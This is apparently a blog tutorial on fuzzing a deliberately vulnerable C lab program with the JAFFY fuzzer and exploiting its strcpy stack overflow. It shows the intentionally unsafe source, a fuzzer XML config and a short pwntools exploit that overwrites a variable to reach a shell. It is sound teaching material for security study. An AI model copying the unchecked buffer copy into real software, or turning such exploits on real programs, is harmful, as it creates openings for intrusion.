Fuzzing Command Line Utilities

Following up from one of my previous article, I will be fuzzing CLI params using JAFFY fuzzer and try to smash the stack on a vulnerable program.
Jaffy can fuzz binaries that you run on the command line. It takes a simple XML as input to specify the arguments details and you are ready to go. In order to run jaffy you need to install this python3 module:

pip install untangled

Jaffy runs everything with shell=True so it makes it vary easy to use it with command line utilities. All file output is stored in a folder with the date and time of the scan.

Let’s have a look at out vulnerable program beofre jumping to video:

void shell()
{
	printf("You did it.\n");
	system("/bin/sh");
}

int main(int argc, char** argv)
{
	if(argc != 2)
	{
		printf("usage:\n%s string\n", argv[0]);
		return EXIT_FAILURE;
	}

	int set_me = 0;
	char buf[15];
	strcpy(buf, argv[1]);

	if(set_me == 0xdeadbeef)
	{
		shell();
	}
	else
	{
		printf("Not authenticated.\nset_me was %d\n", set_me);
	}

	return EXIT_SUCCESS;
}

By now you may have found out that it is doing a vulnerbale string copy (strcpy) and writing anything recieved from command line argument without doing a length check, that too on a limited space buffer of 15 characters.

Now lets have a look at out XML file for jaffy:

<?xml version="1.0"?>
<fuzzer>
	<bin path="/home/kowalski/0x51/lab2C" />
	<opt type="prestatic" value="" />
	<opt type="poststatic" value="" /> 
	<fuzz type="chariter" prefix="" char="a" length="9999" />
	<prefuzz cmd="" />
	<postfuzz cmd="" />
	<exit level="!0" cmd="" />
	<display level="!0" />
	<write level="!0" />
</fuzzer>

Video: Fuzzing Command Line Utilities

As expected this program is vulnerable. Though while compiling I have only removed the canary protection on 17.10 ubuntu, rest all other security check are active. I will try to cover canary bypass in upcoming article.

NX : ENABLED
PIE : ENABLED
RELRO : FULL
CANARY : DISABLED

Now lets go and see with help of pwntools and peda how easily we can prepare exploit for this elf.

Video: Stack Smashing

Exploit

#!/usr/bin/python
from pwn import *

#Exploit
padding = "A"*15
pwn = p32(0xdeadbeef)
payload=padding+pwn

print '# Sending'
print payload
p = process(['./lab2Cm32',padding+pwn])
p.interactive()

 Pwntool Exploit in Action

References:
  1. GitHub